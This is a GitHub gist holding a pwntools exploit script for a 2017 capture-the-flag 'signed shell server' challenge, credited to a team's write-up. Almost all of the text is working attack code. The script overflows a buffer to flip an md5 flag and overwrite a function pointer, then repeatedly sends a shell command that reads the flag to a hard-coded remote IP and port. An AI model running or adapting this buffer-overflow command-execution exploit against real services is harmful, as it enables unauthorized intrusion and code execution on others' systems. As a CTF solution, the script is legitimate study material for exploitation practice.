Created
February 27, 2017 17:02
-
-
Save jiulongw/41be4e78175dc917c231a2c8f4ec5ea6 to your computer and use it in GitHub Desktop.
Sample pwntool usage
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Credits to https://losfuzzys.github.io/writeup/2017/02/27/bkpctf2017-signed-shell-server/ | |
from pwn import * # noqa | |
import string | |
import random | |
velf = ELF("./sss") | |
# this is the byte we'd need... | |
last_byte = velf.symbols['exec_command'] & 0xff | |
log.info("last byte of exec_command 0x{:x}".format(last_byte)) | |
env = {"LD_PRELOAD": os.path.join(os.getcwd(), "./libcrypto.so.1.0.0")} | |
def make_vp(): | |
#return process("./sss_dealarmed", env=env) | |
return remote("54.202.7.144", 9875) | |
# less verbosity for pwntools | |
context.log_level = "error" | |
while True: | |
cmd = "cat flag; echo " + "".join(random.sample(string.letters, 5)) | |
vp = make_vp() | |
# gdb.attach(vp, gdbscript) | |
try: | |
# now overflow into the use_md5 flag | |
# which triggers a buffer overflow into the fptr | |
vp.recvuntil(">_") | |
vp.sendline("2") | |
vp.recvuntil(">_") | |
c = "{}\n\x00".format(cmd) | |
c += "\x00" * (256 - len(c)) | |
vp.send(c) | |
vp.recvuntil(">_") | |
vp.sendline("wurscht") | |
line = vp.recvrepeat(timeout=0.5) | |
log.info("got line: " + repr(line)) | |
except: | |
pass | |
vp.close() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment